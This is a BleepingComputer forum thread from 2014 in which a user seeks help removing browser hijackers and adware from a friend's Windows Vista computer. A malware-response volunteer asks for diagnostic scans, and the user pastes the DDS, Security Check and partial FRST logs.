Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Multiple Infections. Computer Barely Usable.


  • This topic is locked This topic is locked
27 replies to this topic

#1 topper8281

topper8281

  • Members
  • 33 posts
  • OFFLINE
  •  
  • Local time:11:33 AM

Posted 28 October 2014 - 03:59 PM

Hey guys. I'm working on the computer of a friend of mine right now. It seems to have several problems with malware and viruses, though I don't know exactly which ones. I scanned with Malwarebytes and quarantined a bunch of files. Subsequent scans with Malwarebytes, Windows Defender, and Avast say there is nothing wrong, but I know this isn't true. Firefox and Google Chrome have both been hijacked and I can only really browse the net now with Opera. There are constant fake security notifications the moment either of those browsers are opened. There are also many unwanted browser add-ons installed to them.

 

I've pasted in the information from the DDS file, and attached the attach.txt file (EDIT: I guess I wasn't supposed to add this. But the actual program gave conflicting information) to this post. Any help is appreciated here guys.

 

DDS (Ver_2012-11-20.01) - NTFS_x86
Internet Explorer: 7.0.6002.18005
Run by Nick at 13:45:30 on 2014-10-28
#Option MBR scan  is disabled.
Microsoft® Windows Vista™ Ultimate   6.0.6002.2.1252.1.1033.18.2045.1142 [GMT -7:00]
.
AV: avast! Antivirus *Enabled/Updated* {17AD7D40-BA12-9C46-7131-94903A54AD8B}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: avast! Antivirus *Enabled/Updated* {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
.
============== Running Processes ================
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\LogonUI.exe
C:\Windows\system32\SLsvc.exe
C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
C:\Windows\System32\spoolsv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Windows\system32\rundll32.exe
C:\Program Files\LogMeIn Hamachi\hamachi-2.exe
C:\Program Files\uvnc bvba\UltraVNC\WinVNC.exe
C:\Windows\system32\SearchIndexer.exe
C:\Program Files\uvnc bvba\UltraVNC\WinVNC.exe
C:\Windows\system32\taskeng.exe
C:\Program Files\Google\Update\GoogleUpdate.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\rdpclip.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Windows Defender\MSASCui.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Program Files\Alwil Software\Avast5\AvastUI.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Users\Nick\AppData\Local\Google\Update\GoogleUpdate.exe
C:\Users\Nick\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
C:\Program Files\McAfee Security Scan\3.0.285\SSScheduler.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\logon.scr
C:\Program Files\Opera\opera.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k rpcss
C:\Windows\System32\svchost.exe -k secsvcs
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.bing.com/?pc=Z016&form=ZGAPHP
mStart Page = hxxps://www.yahoo.com?fr=hp-avast&type=odc268
mSearch Bar = hxxps://www.yahoo.com?fr=hp-avast&type=odc268
mSearch Page = hxxps://search.yahoo.com/yhs/search?type=odc268&hspart=avast&hsimp=yhs-001&p={searchTerms}
BHO: Adobe PDF Link Helper: {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - c:\program files\common files\adobe\acrobat\activex\AcroIEHelperShim.dll
BHO: RealNetworks Download and Record Plugin for Internet Explorer: {3049C3E9-B461-4BC5-8870-4C09146192CA} - c:\programdata\realnetworks\realdownloader\browserplugins\ie\rndlbrowserrecordplugin.dll
BHO: {626F3344-6A64-3995-E8E7-11D63F841162} - <orphaned>
BHO: {6D5C04CD-A77C-BAB9-6494-57DA426BB009} - <orphaned>
BHO: avast! Online Security: {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - c:\program files\alwil software\avast5\aswWebRepIE.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - c:\program files\common files\microsoft shared\windows live\WindowsLiveLogin.dll
BHO: Windows Live Messenger Companion Helper: {9FDDE16B-836F-4806-AB1F-1455CBEFF289} - c:\program files\windows live\companion\companioncore.dll
uRun: [googletalk] c:\users\nick\appdata\roaming\google\google talk\googletalk.exe /autostart
uRun: [AdobeBridge] <no file>
mRun: [Windows Defender] c:\program files\windows defender\MSASCui.exe -hide
mRun: [Adobe Reader Speed Launcher] "c:\program files\adobe\reader 10.0\reader\Reader_sl.exe"
mRun: [Adobe ARM] "c:\program files\common files\adobe\arm\1.0\AdobeARM.exe"
mRun: [APSDaemon] "c:\program files\common files\apple\apple application support\APSDaemon.exe"
mRun: [AdobeAAMUpdater-1.0] "c:\program files\common files\adobe\oobe\pdapp\uwa\UpdaterStartupUtility.exe"
mRun: [SwitchBoard] c:\program files\common files\adobe\switchboard\SwitchBoard.exe
mRun: [AdobeCS6ServiceManager] "c:\program files\common files\adobe\cs6servicemanager\CS6ServiceManager.exe" -launchedbylogin
mRun: [QuickTime Task] "c:\program files\quicktime\QTTask.exe" -atboottime
mRun: [SunJavaUpdateSched] "c:\program files\common files\java\java update\jusched.exe"
mRun: [AvastUI.exe] "c:\program files\alwil software\avast5\AvastUI.exe" /nogui
mRun: [iTunesHelper] "c:\program files\itunes\iTunesHelper.exe"
StartupFolder: c:\progra~2\micros~1\windows\startm~1\programs\startup\mcafee~1.lnk - c:\program files\mcafee security scan\3.0.285\SSScheduler.exe
mPolicies-Explorer: BindDirectlyToPropertySetStorage = dword:0
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-System: LocalAccountTokenFilterPolicy = dword:1
mPolicies-System: SoftwareSASGeneration = dword:1
IE: {0000036B-C524-4050-81A0-243669A86B9F} - {B63DBA5F-523F-4B9C-A43D-65DF1977EAD3} - c:\program files\windows live\companion\companioncore.dll
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - c:\program files\windows live\writer\WriterBrowserExtension.dll
TCP: NameServer = 192.168.1.1
TCP: Interfaces\{9B9BDB42-202D-4CEB-B010-E5C03725FE0C} : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{CE09BE28-75F0-40B1-8170-1BEE2B43FEDA} : DHCPNameServer = 184.16.4.22 184.16.33.54
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - c:\program files\windows live\photo gallery\AlbumDownloadProtocolHandler.dll
AppInit_DLLs= c:\progra~1\searchprotect\searchprotect\bin\spvc32loader.dll c:\progra~1\optimi~1\optpro~2.dll
LSA: Security Packages =  kerberos msv1_0 schannel wdigest tspkg
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "c:\program files\google\chrome\application\35.0.1916.153\installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
.
================= FIREFOX ===================
.
FF - ProfilePath - c:\users\nick\appdata\roaming\mozilla\firefox\profiles\ghs5oui9.default\
FF - prefs.js: browser.startup.homepage - hxxp://www.google.com/
FF - prefs.js: network.proxy.type - 0
FF - plugin: c:\program files\common files\adobe\oobe\pdapp\ccm\utilities\npAdobeAAMDetect32.dll
FF - plugin: c:\program files\common files\adobe\oobe\pdapp\ccm\utilities\npAdobeAAMDetect64.dll
FF - plugin: c:\program files\google\update\1.3.24.15\npGoogleUpdate3.dll
FF - plugin: c:\program files\microsoft silverlight\5.1.30514.0\npctrlui.dll
FF - plugin: c:\program files\pando networks\media booster\npPandoWebPlugin.dll
FF - plugin: c:\program files\real\realplayer\netscape6\nprpplugin.dll
FF - plugin: c:\program files\windows live\photo gallery\NPWLPG.dll
FF - plugin: c:\programdata\realnetworks\realdownloader\browserplugins\mozillaplugins\nprndlchromebrowserrecordext.dll
FF - plugin: c:\programdata\realnetworks\realdownloader\browserplugins\mozillaplugins\nprndlhtml5videoshim.dll
FF - plugin: c:\programdata\realnetworks\realdownloader\browserplugins\mozillaplugins\nprndlpepperflashvideoshim.dll
FF - plugin: c:\programdata\realnetworks\realdownloader\browserplugins\npdlplugin.dll
FF - plugin: c:\users\nick\appdata\local\google\update\1.3.24.7\npGoogleUpdate3.dll
FF - plugin: c:\users\nick\appdata\roaming\mozilla\firefox\profiles\ghs5oui9.default\extensions\logmeinclient@logmein.com\plugins\npRACtrl.dll
FF - plugin: c:\users\nick\appdata\roaming\mozilla\plugins\npgoogletalk.dll
FF - plugin: c:\users\nick\appdata\roaming\mozilla\plugins\npo1d.dll
FF - plugin: c:\windows\system32\macromed\flash\NPSWF32_15_0_0_189.dll
FF - ExtSQL: !HIDDEN! 2010-11-21 19:35; {20a82645-c095-46ed-80e3-08825760534b}; c:\windows\microsoft.net\framework\v3.5\windows presentation foundation\DotNetAssistantExtension
.
============= SERVICES / DRIVERS ===============
.
R0 aswRvrt;avast! Revert;c:\windows\system32\drivers\aswRvrt.sys [2013-9-7 49944]
R0 aswVmm;avast! VM Monitor;c:\windows\system32\drivers\aswVmm.sys [2013-9-7 206248]
R1 aswSnx;aswSnx;c:\windows\system32\drivers\aswSnx.sys [2011-7-7 787800]
R1 aswSP;aswSP;c:\windows\system32\drivers\aswsp.sys [2010-11-20 422760]
R1 dtsoftbus01;DAEMON Tools Virtual Bus Driver;c:\windows\system32\drivers\dtsoftbus01.sys [2012-10-5 242240]
R2 aswHwid;avast! HardwareID;c:\windows\system32\drivers\aswHwid.sys [2014-8-1 24184]
R2 aswMonFlt;aswMonFlt;c:\windows\system32\drivers\aswMonFlt.sys [2010-11-20 70384]
R2 avast! Antivirus;avast! Antivirus;c:\program files\alwil software\avast5\AvastSvc.exe [2011-1-17 50344]
R2 ca82e1a5;Optimizer Pro Crash Monitor;c:\windows\system32\rundll32.exe [2006-11-2 44544]
R2 FontCache;Windows Font Cache Service;c:\windows\system32\svchost.exe -k LocalServiceAndNoImpersonation [2010-11-25 21504]
R2 Hamachi2Svc;LogMeIn Hamachi Tunneling Engine;c:\program files\logmein hamachi\hamachi-2.exe [2013-6-28 1440080]
R2 uvnc_service;uvnc_service;c:\program files\uvnc bvba\ultravnc\winvnc.exe [2014-10-28 1795864]
R3 b57nd60x;%SvcDispName%;c:\windows\system32\drivers\b57nd60x.sys [2010-11-25 179712]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe [2013-9-11 105144]
S3 fssfltr;FssFltr;c:\windows\system32\drivers\fssfltr.sys [2013-4-14 39272]
S3 fsssvc;Windows Live Family Safety Service;c:\program files\windows live\family safety\fsssvc.exe [2012-3-8 1492840]
S3 massfilter_hs;ZTE HandSet Mass Storage Filter Driver;c:\windows\system32\drivers\massfilter_hs.sys [2012-5-25 9216]
S3 McComponentHostService;McAfee Security Scan Component Host Service;c:\program files\mcafee security scan\3.0.285\McCHSvc.exe [2012-9-5 234776]
S3 RealNetworks Downloader Resolver Service;RealNetworks Downloader Resolver Service;c:\program files\realnetworks\realdownloader\rndlresolversvc.exe [2012-11-29 38608]
S3 SwitchBoard;Adobe SwitchBoard;c:\program files\common files\adobe\switchboard\SwitchBoard.exe [2010-2-19 517096]
S3 TeamViewer8;TeamViewer 8;c:\program files\teamviewer\version8\TeamViewer_Service.exe [2012-12-24 4153184]
S3 WPFFontCache_v0400;Windows Presentation Foundation Font Cache 4.0.0.0;c:\windows\microsoft.net\framework\v4.0.30319\wpf\WPFFontCache_v0400.exe [2013-9-11 770168]
S3 zghsdiag;ZTE General Handset Diagnostic Port;c:\windows\system32\drivers\zghsdiag.sys [2012-5-25 106752]
S3 zghsmdm;ZTE General Handset USB Modem Proprietary;c:\windows\system32\drivers\zghsmdm.sys [2012-5-25 106752]
S3 zghsnmea;ZTE General Handset NMEA Port;c:\windows\system32\drivers\zghsnmea.sys [2012-5-25 106752]
S4 Futuremark SystemInfo Service;Futuremark SystemInfo Service;c:\program files\futuremark\futuremark systeminfo\FMSISvc.exe [2012-1-20 135584]
S4 wlcrasvc;Windows Live Mesh remote connections service;c:\program files\windows live\mesh\wlcrasvc.exe [2010-9-22 51040]
.
=============== Created Last 30 ================
.
2014-10-28 19:23:32    --------    d-----w-    c:\users\nick\appdata\roaming\UltraVNC
2014-10-28 19:14:02    --------    d-----w-    c:\program files\uvnc bvba
2014-10-28 08:57:01    8901368    ----a-w-    c:\programdata\microsoft\windows defender\definition updates\{40b871f3-e229-47e5-afc8-5375605cc10b}\mpengine.dll
2014-10-27 04:28:36    43152    ----a-w-    c:\windows\avastSS.scr
2014-10-27 02:59:15    114904    ----a-w-    c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-10-27 02:56:50    --------    d-----w-    c:\programdata\McAfee Security Scan
2014-10-27 02:56:45    --------    d-----w-    c:\program files\McAfee Security Scan
2014-10-21 10:17:06    81560    ----a-w-    c:\windows\system32\mscories.dll
2014-10-21 10:17:06    156824    ----a-w-    c:\windows\system32\mscorier.dll
2014-10-21 10:17:05    1131664    ----a-w-    c:\windows\system32\dfshim.dll
2014-10-21 10:15:59    389632    ----a-w-    c:\windows\system32\html.iec
2014-10-21 10:15:59    304128    ----a-w-    c:\program files\internet explorer\ieuser.exe
2014-10-21 10:15:58    1827328    ----a-w-    c:\windows\system32\inetcpl.cpl
2014-10-21 10:13:19    2054656    ----a-w-    c:\windows\system32\win32k.sys
2014-10-21 10:03:31    143360    ----a-w-    c:\windows\system32\drivers\fastfat.sys
2014-10-21 10:00:33    66560    ----a-w-    c:\windows\system32\packager.dll
2014-10-14 00:53:01    --------    d-----w-    c:\programdata\SaalesCheckEr
2014-09-30 10:01:03    2048    ----a-w-    c:\windows\system32\tzres.dll
.
==================== Find3M  ====================
.
2014-10-27 04:28:37    70384    ----a-w-    c:\windows\system32\drivers\aswMonFlt.sys
2014-10-27 04:28:37    49944    ----a-w-    c:\windows\system32\drivers\aswRvrt.sys
2014-10-27 04:28:37    24184    ----a-w-    c:\windows\system32\drivers\aswHwid.sys
2014-10-27 04:28:37    206248    ----a-w-    c:\windows\system32\drivers\aswVmm.sys
2014-10-27 04:28:17    787800    ----a-w-    c:\windows\system32\drivers\aswSnx.sys
2014-10-27 02:56:42    71344    ----a-w-    c:\windows\system32\FlashPlayerCPLApp.cpl
2014-10-27 02:56:42    701104    ----a-w-    c:\windows\system32\FlashPlayerApp.exe
2014-10-02 22:53:02    231568    ------w-    c:\windows\system32\MpSigStub.exe
2014-10-01 18:11:20    51928    ----a-w-    c:\windows\system32\drivers\mwac.sys
2014-10-01 18:11:14    75480    ----a-w-    c:\windows\system32\drivers\mbamchameleon.sys
2014-10-01 18:11:10    23256    ----a-w-    c:\windows\system32\drivers\mbam.sys
2014-09-23 23:37:56    834048    ----a-w-    c:\windows\system32\wininet.dll
2014-09-23 23:37:02    53760    ----a-w-    c:\windows\apppatch\iebrshim.dll
2014-09-23 23:36:47    19968    ----a-w-    c:\windows\system32\corpol.dll
2014-09-23 22:27:01    1383424    ----a-w-    c:\windows\system32\mshtml.tlb
2014-08-25 08:04:52    18872    ----a-w-    c:\windows\system32\drivers\SPPD.sys
2014-08-23 01:03:46    297984    ----a-w-    c:\windows\system32\gdi32.dll
2005-01-20 02:35:44    513024    ----a-w-    c:\program files\zsnesw.exe
.
============= FINISH: 13:46:22.73 ===============
 

Attached Files


Edited by topper8281, 28 October 2014 - 06:43 PM.


BC AdBot (Login to Remove)

 


#2 Jo*

Jo*

  • Malware Response Team
  • 3,319 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:08:33 PM

Posted 01 November 2014 - 09:17 AM

:welcome:

Hello topper8281,

my name is Jo and I will help you with your computer problems.


Please follow these guidelines:
  • Logs can take a while to research, so please be patient.
  • Read and follow the instructions in the sequence they are posted.
  • print or copy & save instructions.
  • back up all your private data / important files on another (external) drive before using our tools.
  • Do not install / uninstall any applications, unless otherwise instructed.
  • Use only that tools you have been instructed to use.
  • Copy and Paste the log files inside your post, unless otherwise instructed.
  • Ask for clarification, if you have any questions.
  • Stay with this topic til you get the all clean post.
  • My first language is not english. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.

***


1. Download Security Check by screen317 from here or here.
  • Save it to your Desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
    Vista / Windows 7/8 users right-click and select Run As Administrator.
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document.

***


2. Please download Farbar Recovery Scan Tool and save it to your Desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system, download both of them and try to run them. Only one of them will run on your system, that will be the right version.
  • Right-click FRST / FSRT64 then click "Run as administrator" (XP users: click run after receipt of Windows Security Warning - Open File).
  • When the tool opens, click Yes to disclaimer.
  • Press the Scan button.
  • When finished, it will produce a log called FRST.txt in the same directory the tool was run from.
  • Please copy and paste the log in your next reply.
Note 2: The first time the tool is run it generates another log (Addition.txt - also located in the same directory the tool was run from). Please also paste that, along with the FRST.txt into your next reply.



***


Graduate of the WTT Classroom
Cheers,
Jo
If I have been helping you, and I have not replied to your latest post in 36 hours please send me a PM.


#3 topper8281

topper8281
  • Topic Starter

  • Members
  • 33 posts
  • OFFLINE
  •  
  • Local time:11:33 AM

Posted 01 November 2014 - 12:12 PM

Okay. here are the logs you requested. I had to temporarily disable Avast Antivirus to get FRST to work, but then it did just fine.

 

 Results of screen317's Security Check version 0.99.89  
 Windows Vista Service Pack 2 x86 (UAC is enabled)  
 Internet Explorer 7 Out of date!
``````````````Antivirus/Firewall Check:``````````````
 Windows Firewall Enabled!  
avast! Antivirus   
 Antivirus up to date!   
`````````Anti-malware/Other Utilities Check:`````````
 Adobe Flash Player     15.0.0.189  
 Mozilla Firefox (33.0)
 Google Chrome 35.0.1916.114  
 Google Chrome 35.0.1916.153  
 Google Chrome update.dll..  
````````Process Check: objlist.exe by Laurent````````  
 Windows Defender MSASCui.exe
 Windows Defender MSASCui.exe   
 Alwil Software Avast5 AvastSvc.exe  
 Alwil Software Avast5 AvastUI.exe  
`````````````````System Health check`````````````````
 Total Fragmentation on Drive C: 0 %
````````````````````End of Log``````````````````````
 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 01-11-2014
Ran by Nick (administrator) on WALKER-PC on 01-11-2014 10:08:01
Running from C:\Users\Nick\Desktop
Loaded Profiles: Nick & Bill (Available profiles: Kristi & Hannah & Nick & Bill & UpdatusUser & Dylan & Administrator)
Platform: Microsoft® Windows Vista™ Ultimate  Service Pack 2 (X86) OS Language: English (United States)
Internet Explorer Version 7
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(AVAST Software) C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(LogMeIn Inc.) C:\Program Files\LogMeIn Hamachi\hamachi-2.exe
(UltraVNC) C:\Program Files\uvnc bvba\UltraVNC\winvnc.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCui.exe
(Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(AVAST Software) C:\Program Files\Alwil Software\Avast5\AvastUI.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(Spotify Ltd) C:\Users\Nick\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.0.285\SSScheduler.exe
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(Microsoft Corporation) C:\Windows\System32\LogonUI.exe
(UltraVNC) C:\Program Files\uvnc bvba\UltraVNC\winvnc.exe
(Microsoft Corporation) C:\Windows\System32\rdpclip.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCui.exe
(Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(AVAST Software) C:\Program Files\Alwil Software\Avast5\AvastUI.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Google Inc.) C:\Users\Nick\AppData\Local\Google\Update\GoogleUpdate.exe
(Spotify Ltd) C:\Users\Nick\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.0.285\SSScheduler.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(Opera Software) C:\Program Files\Opera\opera.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1008184 2008-01-19] (Microsoft Corporation)
HKLM\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files\Adobe\Reader 10.0\Reader\Reader_sl.exe [35736 2010-11-10] (Adobe Systems Incorporated)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [932288 2010-11-10] (Adobe Systems Incorporated)
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-04-23] (Apple Inc.)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [444904 2012-09-20] (Adobe Systems Incorporated)
HKLM\...\Run: [SwitchBoard] => C:\Program Files\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM\...\Run: [AdobeCS6ServiceManager] => C:\Program Files\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2013-05-01] (Apple Inc.)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation)
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\Alwil Software\Avast5\AvastUI.exe [5223016 2014-10-26] (AVAST Software)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [152392 2014-05-26] (Apple Inc.)
HKU\S-1-5-19\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
HKU\S-1-5-20\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\Run: [googletalk] => C:\Users\Nick\AppData\Roaming\Google\Google Talk\googletalk.exe [3739648 2007-01-01] (Google)
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\Run: [Google Update] => C:\Users\Nick\AppData\Local\Google\Update\GoogleUpdate.exe [116648 2013-04-10] (Google Inc.)
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\Run: [Spotify Web Helper] => C:\Users\Nick\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe [1140736 2014-05-03] (Spotify Ltd)
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\MountPoints2: G - G:\sources\sperr32.exe x64
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\MountPoints2: {b1134796-9622-11e0-9898-0040f4e8e5d1} - F:\noautorun.exe
HKU\S-1-5-21-2927482541-673307907-4085399872-1004\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-19] (Microsoft Corporation)
HKU\S-1-5-21-2927482541-673307907-4085399872-1004\...\Run: [googletalk] => C:\Users\Bill\AppData\Roaming\Google\Google Talk\googletalk.exe /autostart
HKU\S-1-5-21-2927482541-673307907-4085399872-1004\...\Run: [EA Core] => "C:\Program Files\Electronic Arts\EADM\Core.exe" -silent
HKU\S-1-5-21-2927482541-673307907-4085399872-1004\...\Run: [WMPNSCFG] => C:\Program Files\Windows Media Player\WMPNSCFG.exe [202240 2008-01-19] (Microsoft Corporation)
HKU\S-1-5-21-2927482541-673307907-4085399872-1004\...\Run: [PhotoJoy] => C:\Program Files\PhotoJoy\bin\PhotoJoy.exe /c
HKU\S-1-5-21-2927482541-673307907-4085399872-1004\...\Run: [Desktop Software] => C:\Program Files\Common Files\SupportSoft\bin\bcont.exe [1025320 2009-04-24] (SupportSoft, Inc.)
HKU\S-1-5-21-2927482541-673307907-4085399872-1004\...\Run: [Spotify Web Helper] => C:\Users\Nick\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe [1140736 2014-05-03] (Spotify Ltd)
HKU\S-1-5-21-2927482541-673307907-4085399872-1004\...\Run: [HotkeyP] => C:\Users\Bill\Desktop\Dylan\hotkeyp\HotkeyP.exe 0
HKU\S-1-5-21-2927482541-673307907-4085399872-1004\...\MountPoints2: G - G:\SetUp.exe
HKU\S-1-5-21-2927482541-673307907-4085399872-1004\...\MountPoints2: {99a19f3c-9787-11e0-9a49-0040f4e8e5d1} - G:\LaunchU3.exe -a
HKU\S-1-5-21-2927482541-673307907-4085399872-1004\...\MountPoints2: {a4f858c4-f51d-11df-9bdb-806e6f6e6963} - D:\RunGame.exe
HKU\S-1-5-21-2927482541-673307907-4085399872-1004\...\MountPoints2: {b1134796-9622-11e0-9898-0040f4e8e5d1} - F:\noautorun.exe
AppInit_DLLs: C:\PROGRA~1\SearchProtect\SearchProtect\bin\SPVC32Loader.dll => C:\PROGRA~1\SearchProtect\SearchProtect\bin\SPVC32Loader.dll File Not Found
AppInit_DLLs:  c:\progra~1\optimi~1\optpro~2.dll => c:\Program Files\Optimizer Pro\OptProCrash.dll [3000776 2014-06-15] ()
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.0.285\SSScheduler.exe (McAfee, Inc.)
Startup: C:\Users\Bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\Nick\AppData\Roaming\Dropbox\bin\Dropbox.exe (No File)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\Alwil Software\Avast5\ashShell.dll (AVAST Software)
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
BootExecute: autocheck autochk * sdnclean.exe
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.bing.com/?pc=Z016&form=ZGAPHP
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.yahoo.com?fr=hp-avast&type=odc268
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = https://search.yahoo.com/yhs/search?type=odc268&hspart=avast&hsimp=yhs-001&p={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = https://www.yahoo.com?fr=hp-avast&type=odc268
SearchScopes: HKLM - DefaultScope {9CB96984-43C3-4D44-90EF-01466EFCF7BB} URL = https://search.yahoo.com/yhs/search?type=odc268&hspart=avast&hsimp=yhs-001&p={searchTerms}
SearchScopes: HKLM - {9CB96984-43C3-4D44-90EF-01466EFCF7BB} URL = https://search.yahoo.com/yhs/search?type=odc268&hspart=avast&hsimp=yhs-001&p={searchTerms}
SearchScopes: HKLM - {afdbddaa-5d3f-42ee-b79c-185a7020515b} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3072253
